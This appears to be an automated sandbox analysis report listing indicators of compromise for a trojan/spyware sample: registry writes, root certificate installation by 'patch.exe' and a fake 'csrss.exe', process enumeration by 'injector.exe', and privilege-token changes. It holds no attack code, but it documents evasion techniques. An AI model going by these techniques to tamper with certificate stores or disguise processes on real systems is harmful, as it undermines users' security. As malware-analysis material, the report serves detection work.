Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\da-84-01-ce-37-86	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	JUNRlIz.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadDecisionReason = "1"	JUNRlIz.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadNetworkName = "Network 3"	JUNRlIz.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Ahzn2Szwr26hfrPXyZRPFZkG.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2024	conhost.exe
544	conhost.exe
540	cmd.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
884	lhuGc8cD8YBgMslw3CZs4Nqs.exe
2596	injector.exe
2596	injector.exe
1988	powershell.EXE
2596	injector.exe
1988	powershell.EXE
1988	powershell.EXE
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
452	powershell.EXE
452	powershell.EXE
452	powershell.EXE
2596	injector.exe
2596	injector.exe
2156	csrss.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe
2156	csrss.exe
2596	injector.exe
2156	csrss.exe
2596	injector.exe
2596	injector.exe
2596	injector.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	CasPol.exe
Token: SeDebugPrivilege	2024	conhost.exe
Token: SeDebugPrivilege	544	conhost.exe
Token: SeImpersonatePrivilege	544	conhost.exe
